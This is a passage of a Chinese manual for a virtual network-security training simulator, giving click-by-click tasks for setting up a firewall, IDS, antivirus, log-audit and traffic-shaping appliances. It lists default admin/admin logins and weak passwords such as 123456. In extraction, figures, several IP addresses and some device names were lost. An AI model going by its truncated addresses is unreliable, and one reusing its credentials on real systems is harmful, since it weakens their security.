創(chuàng)壹虛擬網(wǎng)絡安全培訓系統(tǒng)模塊內(nèi)容說明書

創(chuàng)壹虛擬網(wǎng)絡安全培訓系統(tǒng)模塊內(nèi)容說明書目錄1概述 22項目2測試安全產(chǎn)品的可用性并合理部署使用環(huán)境 42.1任務1、防火墻設備驗收 42.2任務2、入侵檢測設備驗收 222.3任務3、完成防病毒軟件環(huán)境搭建 472.4任務4、完成日志審計設備初始測試、版本確認和備份升級工作 712.5任務5、完成流量整形設備初始測試、版本確認和備份升級工作 933項目3完成網(wǎng)絡設備與終端系統(tǒng)的基本安全維護 1113.1任務1、完成交換機安全維護工作 1113.2任務2、完成防火墻的安全維護 1233.3任務3、完成服務器系統(tǒng)級的基本安全維護 1433.4任務4、完成服務器的漏洞查找及補丁升級 1814項目4完成根據(jù)特定需求產(chǎn)生的安全接入控制任務 2184.1任務1、完成所有接入交換機802.1x接入認證設置 2184.2任務2、完成VPN接入服務的配置 2254.3任務3、完成交換機端口安全的配置 2404.4任務4、完成無線路由器的安全配置 2495項目5典型滲透測試演練 2595.1任務1、完成web首頁篡改滲透測試 2595.2任務2、完成linux漏洞利用滲透測試 2705.3任務3、完成sql注入漏洞滲透測試 2885.4任務4、完成windows緩沖區(qū)溢出滲透測試 293

1概述網(wǎng)絡安全實訓中各個小任務的使用方法下面將做詳細介紹。教師類型賬號在教學模式的實訓模塊與學生賬號在實訓模塊的使用方法一致，下面的內(nèi)容介紹將統(tǒng)一用教師賬戶進行詳細的講解。用教師賬戶登錄系統(tǒng)，然后點擊教學模式下的實訓模塊，如下圖所示：常用操作介紹：以防火墻設備驗收為例介紹。打開防火墻設備驗收目錄，然后將防火墻設備，PC機拖入到場景中，如下圖所示。線的連接：以連接電源線為例（所有線的連接方法一致）。首先在設備庫中選擇電源線，然后將鼠標移動到連接的一端上方，然后使用ctrl+左鍵便連接好了一端，接著講數(shù)量移動到需要連接的另一端上方，然后使用shift+左鍵便完成了電源線的連接。線的布局：在連接線的時候使用ctrl+右鍵可以布局線，例如線需要拐彎的時候可以使用該功能。刪除當前繪制的線：按鍵盤上的Delete鍵。撤銷正在繪制的線：按鍵盤上的Z鍵。刪除已經(jīng)繪制的線：在場景中用鼠標點擊該線，線的顏色會變成紅色，然后使用Alt+鼠標左鍵刪除改線。設備的刪除：將鼠標移動到該設備的上方，然后使用Alt+鼠標左鍵刪除該設備。

2項目2測試安全產(chǎn)品的可用性并合理部署使用環(huán)境2.1任務1、防火墻設備驗收第一步：點擊“項目2測試安全產(chǎn)品的可用性并合理部署使用環(huán)境”目錄下的“任務1、防火墻設備驗收”目錄，點擊后界面如下圖所示：

第二步：在清單中勾選界面右面“設備庫”中存在的物品，這里勾選防火墻，console線纜，電源線,勾選完之后點擊“確定”按鈕，如下圖所示：點擊確定后，界面如下圖所示：

第三步：依次拖入“防火墻設備”和“臺式PC機”到場景中的桌子上。（拖入的方法是將鼠標移動到設備庫中的某個設備上方，然后按住鼠標左鍵不放，接著移動鼠標到場景中的桌子上便可），拖入設備后的界面如下圖所示：

第四步：連接防火墻電源接口與插座，在設備庫中選中“”，然后將鼠標移動到插座上的“”上方，接著按住鍵盤上的Ctrl鍵，然后點擊鼠標左鍵，這樣就接上了插座一端，接著還要接上防火墻一端，所以繼續(xù)將鼠標移動到防火墻的電源口，然后按住鍵盤上的Shift鍵，最后點擊鼠標左鍵，這樣便將防火墻電源接口與插座連接好了，如下圖所示：接著用將防火墻設備的與PC機的串口連接起來，連接方法和電源線一樣。

第五步：用鼠標單擊防火墻上的開關(guān)按鈕，將開關(guān)打到ON狀態(tài)，如下圖所示：第六步：用鼠標單擊場景中的PC機顯示器，如下圖所示：

第七步：雙擊超級終端圖標，打開如下圖所示“新建連接”窗口和“連接描述”窗口。第八步：在“連接描述”窗口的名稱中輸入“防火墻”，單擊“登錄”按鈕，（如果沒輸入，直接點擊“確定”顯示提示框“請輸入正確的連接名稱！”，點擊“取消”按鈕則關(guān)閉窗口，回到桌面），點擊登錄按鈕后界面如下圖所示：第九步：接著第八步，繼續(xù)點擊“登錄”按鈕，界面如下圖所示：第十步：在第九步圖的“每秒位數(shù)”、“數(shù)據(jù)位”、“奇偶校驗”、“停止位”、“數(shù)據(jù)流控制”下拉列表中分別選擇9600、8、無、1、無。單擊“還原為默認值”亦可實現(xiàn)“9600、8、無、1、無”的一鍵設置，點擊登錄按鈕，如下圖所示：

第十一步：在上圖的“l(fā)ogin：”后面輸入默認用戶名“admin”，按回車，顯示如下圖所示界面。第十二步：在上圖的“password：”后面輸入默認密碼“admin”，顯示如下圖所示界面。

第十三步：在上圖的“DCFW-1800#”后輸入“configure”命令，按“Enter”鍵顯示如下圖所示界面。第十四步：從設備庫中取出交叉雙絞線連接防火墻的e0/0以太網(wǎng)口和PC機的以太網(wǎng)口，如下圖所示。此時防火墻相應的以太網(wǎng)口LNK燈亮起，表明網(wǎng)絡的物理連接已經(jīng)建立。觀察指示燈（ACT燈）狀態(tài)為閃爍，表明有數(shù)據(jù)在嘗試傳輸。如果用直通線連接防火墻與PC機，防火墻冒煙、面板上的燈不亮，并提示“請選擇正確的線纜，不然防火墻設備會被燒壞！”。第十五步：重復第14步，，依次連接防火墻其他的以太網(wǎng)口，連接時相應的以太網(wǎng)口LNK燈亮起。所有以太網(wǎng)口均連接后，點擊圖標，提示“請確定防火墻端口均正常(即LNK燈在測試時均能亮起)，如若有問題請聯(lián)系廠家！”。如果沒有測試完全部以太網(wǎng)口就退出實驗，點擊圖標后提示“不要忘記所有網(wǎng)口都要測一遍！”。沒有測完，點擊圖標，如下圖所示：測完了，點擊圖標，如下圖所示：第十六步：開啟Telnet管理功能，在防火墻-超級終端界面中的“DCFW-1800#”后輸入“configure”命令，按“Enter”鍵換行，并顯示“DCFW-1800(config)#”；在其后輸入“interfaceE0/0”，按“Enter”鍵換行并顯示“DCFW-1800(config-if-eth0/0)#”；在其后輸入“managetelnet”，按“Enter”鍵換行。完成后如下圖所示。

第十七步：Telnet連接防火墻，單擊PC顯示器上的“開始”菜單，單擊“運行”，并在“運行”文本框中輸入“cmd”，如下圖所示：第十八步：在上圖中單擊“確定”按鈕，打開如下圖所示界面。第十九步：在上如中輸入“telnet”，按“enter”鍵，顯示如下圖所示：第二十步：在上圖中的login,password后面依次輸入admin，如下圖所示：

第二十一步：在上圖中的“DCFW-1800#”后輸入“configure”命令，按“Enter”鍵換行，并顯示“DCFW-1800(config)#”；在其后輸入“adminusertest”，按“Enter”鍵換行并顯示“DCFW-1800(config-admin)#”；在其后輸入“privilegeRXW”，按“Enter”鍵換行并顯示“DCFW-1800(config-admin)#”；在其后輸入“passwordtest”，按“Enter”鍵換行。完成后如下圖所示：第二十二步：使用WebUI管理防火墻，打開PC桌面上的IE瀏覽器，在網(wǎng)址中輸入“”，如下圖所示：第二十三步：在上圖中的“用戶名”、“密碼”中輸入admin（默認用戶名、密碼）；“語言”中包含“English和中文”，選擇“中文”。單擊“登錄”按鈕，顯示界面如下圖所示：第二十四步：防火墻重命名，單擊上圖左側(cè)“系統(tǒng)”鏈接，注意左右兩側(cè)的變化。在“主機名稱”文本框中輸入“DCFW-1800-TEST”,單擊“確定”按鈕，“主機名稱”文本框中內(nèi)容改為“DCFW-1800-TEST”，如下圖所示：

第二十五步：回到防火墻登錄初始界面，點擊界面上的“升級”按鈕，如下圖所示：第二十六步：防火墻升級界面，如下圖所示：

第二十七步：點擊瀏覽按鈕，打開如下圖所示窗口：第二十八步：選擇“DCFOS-2.0R5.p5”，單擊“打開”按鈕，顯示如下圖所示：

第二十九步：在“選擇下次啟動時使用的系統(tǒng)固件(系統(tǒng)需要重啟以生效)”后面的列表框中選擇“DCFOS-2.0R5.p5”，設定下次啟動時使用的系統(tǒng)固件，單擊“確定”按鈕，如下圖所示。完成配置，關(guān)閉瀏覽器。

2.2任務2、入侵檢測設備驗收第一步：第一步：點擊“項目2測試安全產(chǎn)品的可用性并合理部署使用環(huán)境”目錄下的“任務2、入侵檢測設備驗收”目錄，點擊后界面如下圖所示：第二步：在清單中勾選界面右面“設備庫”中存在的物品，這里勾選入侵檢測設備，console線纜，電源線,勾選完之后點擊“確定”按鈕，如下圖所示：點擊確定后，界面如下圖所示：第三步：依次拖入“入侵檢測設備”和“臺式PC機”到場景中的桌子上。（拖入的方法是將鼠標移動到設備庫中的某個設備上方，然后按住鼠標左鍵不放，接著移動鼠標到場景中的桌子上便可），拖入設備后的界面如下圖所示：

第四步：連接入侵檢測設備電源接口與插座，在設備庫中選中“”，然后將鼠標移動到插座上的“”上方，接著按住鍵盤上的Ctrl鍵，然后點擊鼠標左鍵，這樣就接上了插座一端，接著還要接上入侵檢測設備一端，所以繼續(xù)將鼠標移動到入侵檢測設備的電源口，然后按住鍵盤上的Shift鍵，最后點擊鼠標左鍵，這樣便將入侵檢測設備電源接口與插座連接好了，如下圖所示：接著用將入侵檢測設備的與PC機的串口連接起來，連接方法和電源線一樣。

第五步：用鼠標單擊場景中的PC機顯示器，如下圖所示：第六步：雙擊超級終端圖標，打開如下圖所示“新建連接”窗口和“連接描述”窗口。

第七步：在“連接描述”窗口的名稱中輸入“入侵檢測設備”，單擊“登錄”按鈕，（如果沒輸入，直接點擊“確定”顯示提示框“請輸入正確的連接名稱！”，點擊“取消”按鈕則關(guān)閉窗口，回到桌面），點擊登錄按鈕后界面如下圖所示：第八步：繼續(xù)接上一步，點擊“登錄”按鈕，界面如下圖所示：

第九步：在第八步圖的“每秒位數(shù)”、“數(shù)據(jù)位”、“奇偶校驗”、“停止位”、“數(shù)據(jù)流控制”下拉列表中分別選擇9600、8、無、1、無。單擊“還原為默認值”亦可實現(xiàn)“9600、8、無、1、無”的一鍵設置，點擊登錄按鈕，如下圖所示：第十步：按任意鍵，界面如下圖所示：

第十一步：“Masteradministratorpassword:”后面輸入出廠默認的傳感器密碼“admin”，按Enter鍵，界面如下圖所示：第十二步：用鼠標點擊“Configurenetworking”，界面如下圖所示：

第十三步：在“Managementinterface:”后面選擇em1，在“IPAddress:”后面填寫8，在“NetworkMask:”后面填寫，在“IPofDCNIDSServer:”后面填寫0，在“EncryptionPassphrase:”后面填寫dcids，在“RepeatEncryptionPassphrase:”后面填寫dcids，如下圖所示：

第十四步：從設備庫中取出交叉雙絞線連接入侵檢測設備的EM0以太網(wǎng)口和PC機的以太網(wǎng)口，如下圖所示。此時入侵檢測設備相應的以太網(wǎng)口LNK燈亮起，表明網(wǎng)絡的物理連接已經(jīng)建立。觀察指示燈（ACT燈）狀態(tài)為閃爍，表明有數(shù)據(jù)在嘗試傳輸。如果用直通線連接入侵檢測設備與PC機，防火墻冒煙、面板上的燈不亮，并提示“請選擇正確的線纜，不然防火墻設備會被燒壞！”。第十五步：重復第14步，，依次連接入侵檢測設備的其他以太網(wǎng)口，連接時相應的以太網(wǎng)口LNK燈亮起。所有以太網(wǎng)口均連接后，點擊PC機桌面的圖標，提示“請確定防火墻端口均正常(即LNK燈在測試時均能亮起)，如若有問題請聯(lián)系廠家！”。如果沒有測試完全部以太網(wǎng)口就退出實驗，點擊圖標后提示“不要忘記所有網(wǎng)口都要測一遍！”。

沒有測完，點擊圖標，如下圖所示：測完了，點擊圖標，如下圖所示：網(wǎng)口測試完了之后，需要重新用交叉雙絞線將入侵檢測設備上的EM0口與PC機的以太網(wǎng)口連接，以便進行下一步操作。

第十六步：單擊“安裝SQLserver2000”按鈕，如下圖所示。單擊“安裝SQLServer2000組件”和“安裝SQLServer2000的先決條件”均可進入下一步，但是單擊“安裝SQLServer2000的先決條件”算錯誤。

第十七步：選擇點擊“安裝數(shù)據(jù)庫服務器”，界面如下圖所示：第十八步：選擇“本地計算機”，單擊“下一步”，界面如下圖所示：第十九步：選擇“創(chuàng)建新的SQLServer實例，或安裝‘客戶端工具’”算正確，單擊“下一步”，界面如下圖所示：第二十步：選擇“服務器和客戶端工具’”算正確，單擊“下一步”，界面如下圖所示：第二十一步：單擊“下一步”，界面如下圖所示：第二十二步：選擇“混合模式”，使用“123456”，單擊下一步，顯示提示信息“SQLServer2000”安裝成功并且服務已啟動，界面如下圖所示：第二十三步：單擊“安裝LogServer”按鈕，界面如下圖所示。各項內(nèi)容輸入（例如）：服務器地址：0；服務器端口：1433；數(shù)據(jù)庫名稱：IDS_LogServer；訪問帳號名：sa；訪問密鑰串：123456。第二十四步：單擊“完成”按鈕，顯示提示信息“LogServer”安裝成功并且服務已啟動，返回步驟2所述界面。界面如下圖所示：第二十五步：單擊“安裝事件收集器（EC）”按鈕，顯示提示信息“事件收集器（EC）”安裝成功并且服務已啟動，界面如下圖所示：第二十六步：單擊“安裝許可密鑰”按鈕，界面如下圖所示：第二十七步：單擊“安裝”按鈕，顯示提示信息“許可密鑰”安裝成功并且服務已啟動，界面如下圖所示：第二十八步：往場景中拖入交換機，然后用直通雙絞線將PC機連接交換機，交換機連接入侵檢測設備（連接之前先把之前連接的網(wǎng)線刪掉），還有一點需要說明，當場景中同時有交換機和別的設備，那么交換機默認帶電。接好線之后，場景如下圖所示：

第二十九步：單擊PC機顯示器，視角定位到顯示器，“開始→程序→入侵檢測系統(tǒng)（網(wǎng)絡）→DCNIDS管理控制臺”，如下圖所示：

第三十步：輸入服務器地址0，并使用：Admin，密碼：Admin。（注意第一個字母大寫）登錄。啟動管理控制臺界面如下圖所示，“用戶“圖標為選中狀態(tài)。

第三十一步：添加用戶，在三十步的圖中點擊“添加用戶”，即可添加一個用戶，添加了一個名字為dcnu的用戶，其使用的帳號為dcnu，密碼也同時進行設置（本例使用密碼123456），并且在右側(cè)權(quán)限配置處已明確規(guī)定他的權(quán)限為可進行安全事件的瀏覽和報表察看，以及系統(tǒng)日志的瀏覽等，但此用戶沒有管理的權(quán)限。單擊確定即可增加一個用戶。為了方便起見，在后面的配置中，我們將此用戶的權(quán)限增加至所有可進行的操作，但并不建議在企業(yè)非任務環(huán)境中作如此的設置，應對不同的安全管理人員分別設置不同的權(quán)限，將控制權(quán)分散，有利于實現(xiàn)更安全的網(wǎng)絡管理。如下圖所示：

第三十二步：添加組件，當前為dcnu登錄，因為admin用戶無權(quán)進行添加組件的操作。如下圖所示，“組件“圖標為選中狀態(tài)。第三十三步：單擊“添加組件”添加網(wǎng)絡中新部署的安全部件。系統(tǒng)將彈出如下圖所示對話框

單擊確定，進行傳感器屬性配置，輸入當前網(wǎng)絡的傳感器，并將密鑰與傳感器配置的EC通信密鑰對應，（本任務根據(jù)傳感器已配置的通道密鑰，設置為dcids）進行連接測試如下圖所示。第三十四步：測試完畢，系統(tǒng)出現(xiàn)如下圖所示提示信息，表示連接正常。單擊“確定“按鈕，即可開始當前選定策略向傳感器的發(fā)送并完成此傳感器的添加。

第三十五步：傳感器添加成功后，再添加logserver組件。右鍵單擊EC，選擇添加組件，如下圖所示。第三十六步：選擇“添加組件“彈出界面如下圖所示。

第三十七步：選擇LogServer，單擊確定按鈕，此處輸入已經(jīng)配置好的LOGSERVER的IP地址和名稱，單擊“確定“按鈕，顯示如下圖所示界面。單擊“是“按鈕完成配置。

第三十八步：鼠標右鍵單擊交換機，視角定位到交換機配置界面，如下圖所示界面。第三十九步：工作區(qū)空白處顯示dcs(config)#，光標在#后閃爍。輸入”monitorsession1sourceinterfaceethernet0/0/1;2“，按Enter鍵換行顯示dcs(config)#，輸入”monitorsession1destinationinterfaceethernet0/0/24“，按Enter鍵完成配置，如下圖所示：2.3任務3、完成防病毒軟件環(huán)境搭建第一步：點擊“項目2測試安全產(chǎn)品的可用性并合理部署使用環(huán)境”目錄下的“任務3、完成防病毒軟件環(huán)境搭建”目錄，點擊后界面如下圖所示：第二步：依次拖入“交換機”，“臺式PC機”和“服務器”到場景中的桌子上。拖入設備后的界面如下圖所示：

第三步：用電源線將交換機與插座連接，用Console線將交換機的Console口與PC機com口連接，用直通雙絞線，分別連接服務器與交換機，PC終端與交換機，連接好了之后，界面如下圖所示：

第四步：單擊服務器顯示器，視角定位到服務器桌面，界面如下圖所示：第五步：單擊“安裝防病毒軟件”圖標，顯示如下圖所示界面

第六步：在服務器上安裝“系統(tǒng)中心”和“升級服務器”，在第五步中單擊“手動安裝”選項卡，顯示如下圖所示界面。第七步：單擊“客戶端”前面的復選框，去掉勾；在“系統(tǒng)中心”和“升級服務器”前的復選框中單擊，使其變?yōu)檫x中狀態(tài)，如下圖所示。

第八步：單擊“開始安裝”按鈕，打開如下圖所示界面。在“請輸入控制臺端口”中輸入端口號，如8080。第九步：單擊“安裝”按鈕，打開如下圖所示界面。

第十步：默認選擇“主控系統(tǒng)中心”，單擊“下一步”按鈕，顯示如下圖所示界面。第十一步：在圖中的兩個密碼框中輸入密碼，兩次輸入的密碼應該一致，如不一致顯示提示信息，如下圖所示。

第十二步：正確輸入密碼之后，單擊“下一步”按鈕，顯示如下圖所示界面。第十三步：單擊“完成”按鈕完成“系統(tǒng)中心”的安裝。彈出“升級服務器”安裝的向?qū)Ы缑妫缦聢D所示。

第十四步：單擊“下一步”按鈕，打開如下圖所示的界面。第十五步：輸入服務器的IP地址，如“7”。單擊“下一步”按鈕，打開如下圖所示界面。

第十六步：默認選擇“主升級服務器”，單擊“下一步”按鈕。顯示如下圖所示界面。單擊“完成”按鈕，完成“升級服務器”的安裝。第十七步：返回三維場景，單擊PC機顯示器，視角定位到PC機桌面，并打開IE瀏覽器，在地址欄中輸入剛剛安裝“系統(tǒng)中心”和“升級服務器”是配置的IP地址和端口號，如7:8080，打開如下圖所示界面。

第十八步：單擊“安裝客戶機”鏈接，打開如下圖所示界面。第十九步：單擊“點擊安裝32位客戶端”鏈接，打開如下圖所示界面。

第二十步：單擊“是”按鈕，客戶端進行安裝，如下圖所示。第二十一步：安裝完成后，顯示如下圖所示界面。單擊“關(guān)閉”按鈕退出安裝。

第二十二步：返回，單擊服務器顯示器，單擊“金山毒霸系統(tǒng)中心控制臺”圖標，如下圖所示界面。

第二十三步：單擊“管理員登錄”按鈕，用戶名默認是“admin”，密碼是安裝時設置的密碼（這里密碼是admin）。用戶名或密碼輸入錯誤，則進行提示。如果輸入正確，顯示如下圖所示界面。第二十四步：點擊“系統(tǒng)管理”，然后再點擊“賬號管理”，點擊后界面如下圖所示：、

第二十五步：添加賬戶，單擊“添加賬號”，填寫相關(guān)信息。如下圖所示界面。第二十六步：單擊“提交”按鈕，界面中增加一條記錄，如下圖所示。

第二十七步：客戶機管理，鼠標移至“客戶機管理”，顯示二級菜單，如下圖所示。第二十八步：選擇“所有客戶機”，如下圖所示?？蛻魴C列表中顯示剛剛安裝客戶端軟件的PC客戶端的相關(guān)信息。

第二十九步：選擇“查殺病毒”，打開如下圖所示界面。第三十步：單擊“開始殺毒”，顯示下圖提示。第三十一步：在客戶機列表中選擇要殺毒的客戶機，選中客戶機前的復選框中。如下圖所示。第三十二步：單擊“開始殺毒”，打開如下圖所示界面。第三十三步：修改客戶端卸載密碼，選擇“客戶機組”二級菜單，打開如下圖所示界面。

第三十四步：設置客戶端卸載權(quán)限和設置客戶端關(guān)閉權(quán)限的“密碼”和“確認密碼”中分別輸入要使用的密碼。滾動鼠標，顯示如下圖所示界面。第三十五步：單擊“應用”按鈕，顯示下圖提示。單擊“應用”按鈕，如果“密碼“和”確認密碼“不一致，顯示下圖所示提示。

若“密碼“和”確認密碼“一致，顯示下圖所示提示。第三十六步：選擇“允許自行卸載客戶端”和“允許自行關(guān)閉客戶端”，其下對應的密碼框均為灰色，如下圖所示。

第三十七步：單擊“應用”按鈕，顯示如下圖所示界面。第三十八步：返回三維場景，單擊PC終端顯示器，單擊“金山毒霸網(wǎng)絡版客戶端”圖標，如下圖所示：第三十九步：左側(cè)單擊“安全狀態(tài)”，顯示下圖所示界面。第四十步：單擊“立即升級”按鈕，顯示下圖所示界面。

第四十一步：單擊“開始”按鈕，開始升級，如下圖所示第四十二步：升級完成后顯示如下圖所示界面，單擊“稍后重啟”按鈕，回到第三十九步所示界面。

第四十三步：在第三十九步所示界面，單擊“漏洞掃描”按鈕，顯示如下圖所示界面。第四十四步：單擊“掃描”按鈕，開始掃描，如下圖所示。第四十五步：修復過程如下圖所示。第四十六步：漏洞修復完成后顯示下圖所示界面。單擊“否”按鈕，關(guān)閉界面。（“”按鈕不可以按）。

2.4任務4、完成日志審計設備初始測試、版本確認和備份升級工作第一步：點擊“項目2測試安全產(chǎn)品的可用性并合理部署使用環(huán)境”目錄下的“任務4、完成日志審計設備初始測試、版本確認和備份升級工作”目錄，點擊后界面如下圖所示：第二步：在清單中勾選界面右面“設備庫”中存在的物品，這里勾選日志審計設備，console線纜，電源線,勾選完之后點擊“確定”按鈕，如下圖所示：點擊確定后，界面如下圖所示：第三步：從設備庫中取出PC機和日志審計設備，放置桌子上。在設備庫中選擇日志審計設備電源線，連接日志審計設備電源接口與插座；在設備庫中取出console線，連接PC機的COM口與日志審計設備的控制臺串口，打開日志審計設備開關(guān)，完成后，如下圖所示：

第四步：點擊PC機顯示器，視角定位到顯示器。雙擊超級終端圖標，打開如下圖所示“新建連接”窗口和“連接描述”窗口。第五步：在“連接描述”窗口的名稱中輸入“日志審計設備”，單擊“確定”按鈕，顯示如下圖所示“連接到”窗口。

第六步：這里要求選擇“COM1”，點擊確定按鈕，進入界面如下圖所示：第七步：在上圖的“每秒位數(shù)”、“數(shù)據(jù)位”、“奇偶校驗”、“停止位”、“數(shù)據(jù)流控制”下拉列表中分別選擇9600、8、無、1、無。單擊“還原為默認值”亦可實現(xiàn)“9600、8、無、1、無”的一鍵設置，點擊登錄按鈕，如下圖所示：

第八步：在Netloglogin后面輸入“admin”，回車換行顯示“Password：”，輸入密碼“admin”,回車換行顯示“NetLoglogin#”。如下圖所示：第九步：從設備庫中取出交叉雙絞線連接日志審計設備的以太網(wǎng)口和PC機的以太網(wǎng)口。此時日志審計設備相應的以太網(wǎng)口LNK燈亮起，表明網(wǎng)絡的物理連接已經(jīng)建立。如果用直通線連接日志審計設備與PC機，日志審計設備冒煙、面板上的燈不亮，并提示“請選擇正確的線纜，不然日志審計設備會被燒壞！”。

第十步：重復第九步，依次連接日志審計設備其他的以太網(wǎng)口，連接時相應的以太網(wǎng)口LNK燈亮起。所有以太網(wǎng)口均連接后，點擊PC機桌面的圖標，輸入網(wǎng)址，點擊按鈕，提示“請確定防火墻端口均正常(即LNK燈在測試時均能亮起)，如若有問題請聯(lián)系廠家！”。如果沒有測試完全部以太網(wǎng)口就退出實驗，點擊圖標，輸入網(wǎng)址，點擊按鈕，提示“不要忘記所有網(wǎng)口都要測一遍！”。沒有測完所有網(wǎng)口，系統(tǒng)提示如下所示：

測完所有網(wǎng)口，系統(tǒng)提示如下所示：第十一步：登錄到DCBI-NetLog系統(tǒng)：雙擊PC機顯示器，打開PC桌面，雙擊IE瀏覽器圖標。地址欄中輸入默認的管理地址54，顯示如下圖所示，輸入用戶名：admin，密碼：admin。

第十二步：單擊“登錄”，打開下圖所示。第十三步：單擊右上角“初裝向?qū)А卑粹o，顯示下圖所示。

第十四步：單擊“下一步”按鈕，顯示下圖所示。第十五步：單擊“下一步”按鈕，顯示下圖所示。

第十六步：單擊“下一步”按鈕，顯示下圖所示。第十七步：雙擊eth3這一行，顯示下圖所示。設置過后，單擊“保存”按鈕，信息更新顯示在第十六步的圖上。

第十八步：在第十六步的圖中點擊“下一步”按鈕，顯示下圖所示。第十九步：單擊“下一步”按鈕，顯示下圖所示。

第二十步：單擊“下一步”按鈕，顯示下圖所示。第二十一步：單擊“下一步”按鈕，顯示下圖所示。單擊“完成”按鈕，返回第十二步中的界面。

第二十二步：單擊左側(cè)“系統(tǒng)狀態(tài)-系統(tǒng)信息-當前狀態(tài)”，顯示下圖所示。第二十三步：單擊左側(cè)“系統(tǒng)狀態(tài)-系統(tǒng)信息-服務狀態(tài)”，顯示下圖所示。

第二十四步：單擊左側(cè)“系統(tǒng)管理-基本信息-部署方式”，顯示下圖所示。第二十五步：單擊左側(cè)“系統(tǒng)管理-基本信息-管理端口”，顯示下圖所示。

第二十六步：單擊左側(cè)“系統(tǒng)管理-基本信息-數(shù)據(jù)庫配置”，顯示下圖所示。第二十七步：單擊左側(cè)“系統(tǒng)管理-基本信息-遠程管理”，顯示下圖所示。

第二十八步：單擊左側(cè)“系統(tǒng)管理-備份恢復-手工備份”，顯示下圖所示。第二十九步：單擊左側(cè)“系統(tǒng)管理-權(quán)限管理-角色管理”，顯示下圖所示。

第三十步：單擊“添加”按鈕，顯示下圖所示。第三十一步：單擊左側(cè)“系統(tǒng)管理-權(quán)限管理-權(quán)限分配”，顯示下圖所示。下拉列表框中顯示剛剛添加的角色名稱，在下面的復選框中做勾選，單擊“確定”按鈕保存。第三十二步：單擊左側(cè)“系統(tǒng)管理-系統(tǒng)日志-日志查看”，顯示下圖所示。第三十三步：單擊左側(cè)“應用管理-即時聊天-QQ”，顯示下圖所示。

第三十四步：單擊左側(cè)“內(nèi)容管理-內(nèi)容規(guī)則-規(guī)則配置”，顯示下圖所示。第三十五步：單擊左側(cè)“內(nèi)容管理-內(nèi)容規(guī)則-擴展過濾”，顯示下圖所示。

第三十六步：單擊左側(cè)“內(nèi)容管理-網(wǎng)頁內(nèi)容-WEB郵件”，顯示下圖所示。第三十七步：單擊左側(cè)“內(nèi)容管理-內(nèi)容規(guī)則-微博審計”，顯示下圖所示。

第三十八步：單擊左側(cè)“內(nèi)容管理-傳輸文件內(nèi)容-下載內(nèi)容”，顯示下圖所示。第三十九步：單擊左側(cè)“統(tǒng)計報表-統(tǒng)計報表-流量分析”，顯示下圖所示。

第四十步：在下拉列表中選擇“累計流量最大用戶”，顯示下圖所示。第四十一步：單擊左側(cè)“統(tǒng)計報表-統(tǒng)計報表-在線聊天”，顯示下圖所示。2.5任務5、完成流量整形設備初始測試、版本確認和備份升級工作第一步：點擊“項目2測試安全產(chǎn)品的可用性并合理部署使用環(huán)境”目錄下的“任務5、完成流量整形設備初始測試、版本確認和備份升級工作”目錄，點擊后界面如下圖所示：第二步：在清單中勾選界面右面“設備庫”中存在的物品，這里勾選流量整形設備，console線纜，電源線,勾選完之后點擊“確定”按鈕，如下圖所示：

點擊確定后，界面如下圖所示：第三步：從設備庫中取出PC機和流量整形設備，放置桌子上，在設備庫中選擇流量整形設備電源線，連接流量整形設備電源接口與插座；在設備庫中取出console線，連接PC機的COM口與流量整形設備的控制臺串口，完成后，如下圖所示：

第四步：點擊PC機顯示器，視角定位到顯示器。雙擊超級終端圖標，打開如下圖所示“新建連接”窗口和“連接描述”窗口。第五步：在“連接描述”窗口的名稱中輸入“流量整形設備”，單擊“確定”按鈕，顯示如下圖所示“連接到”窗口。

第六步：這里要求選擇“COM1”，點擊確定按鈕，進入界面如下圖所示：第七步：在上圖的“每秒位數(shù)”、“數(shù)據(jù)位”、“奇偶校驗”、“停止位”、“數(shù)據(jù)流控制”下拉列表中分別選擇9600、8、無、1、無。單擊“還原為默認值”亦可實現(xiàn)“9600、8、無、1、無”的一鍵設置，點擊登錄按鈕，如下圖所示：

第八步：DCFClogin后面輸入“admin”，回車換行顯示“Password：”，輸入密碼“admin”,回車換行顯示“DCFS#”。如下圖所示：

第九步：從設備庫中取出交叉雙絞線連接流量整形設備的以太網(wǎng)口和PC機的以太網(wǎng)口，如下圖所示。此時流量整形設備相應的以太網(wǎng)口LNK燈亮起，表明網(wǎng)絡的物理連接已經(jīng)建立。如果用直通線連接流量整形設備與PC機，流量整形設備冒煙、面板上的燈不亮，并提示“請選擇正確的線纜，不然流量整形設備會被燒壞！”。第十步：重復第九步，依次連接流量整形設備其他的以太網(wǎng)口，連接時相應的以太網(wǎng)口LNK燈亮起。所有以太網(wǎng)口均連接后，點擊PC機桌面的圖標，提示“請確定防火墻端口均正常(即LNK燈在測試時均能亮起)，如若有問題請聯(lián)系廠家！”。如果沒有測試完全部以太網(wǎng)口就退出實驗，點擊圖標，提示“不要忘記所有網(wǎng)口都要測一遍！”。

沒有測完所有網(wǎng)口，系統(tǒng)提示如下所示：測完所有網(wǎng)口，系統(tǒng)提示如下所示：第十一步：登錄到DCFS系統(tǒng)：雙擊PC機顯示器，打開PC桌面，雙擊IE瀏覽器圖標。地址欄中輸入默認的管理地址19:9999，顯示下圖所示。

第十二步：輸入用戶名：admin，密碼：admin，單擊“登錄”，打開界面如下圖所示。第十三步：單擊左側(cè)“添加/修改管理員”選項，如下圖所示。

第十四步：單擊右上角的“新增管理員”，按鈕，顯示下圖所示。第十五步：填寫名稱、密碼、重復密碼、狀態(tài)，單擊“設定”按鈕，顯示圖14所示。單擊“重置”按鈕，名稱、密碼、重復密碼三個文本框清空，狀態(tài)為“激活”，如下圖所示：

密碼與重復密碼輸入不一致，顯示下圖所示。第十六步：單擊左側(cè)“協(xié)議庫升級”，顯示下圖所示。

第十七步：單擊左側(cè)“配置文件下載”，顯示下圖所示。第十八步：單擊左側(cè)“網(wǎng)絡管理”，顯示下圖所示。

第十九步：單擊左側(cè)的“網(wǎng)絡區(qū)域設置”，顯示下圖所示。第二十步：單擊內(nèi)網(wǎng)后的“設置”按鈕，顯示下圖所示。復選框可勾選。

第二十一步：單擊左側(cè)“Mac地址列表”，顯示下圖所示。第二十二步：單擊左側(cè)“新增Mac映射”，填寫IP、MAC，選擇所屬接口，設定后如下圖所示。

第二十三步：單擊左側(cè)“保存地址列表”，顯示下圖所示。第二十四步：單擊左側(cè)“對象管理”，顯示下圖所示。

第二十五步：單擊左側(cè)“應用對象管理”，顯示下圖所示。第二十六步：單擊“新增應用對象”，如下圖所示。

第二十七步：單擊“控制策略”，顯示下圖所示。第二十八步：單擊“參數(shù)設置”，顯示下圖所示。

第二十九步：單擊左側(cè)“系統(tǒng)監(jiān)控”下的流量分析圖，顯示圖36所示。選擇流量分析圖列表如下圖所示。

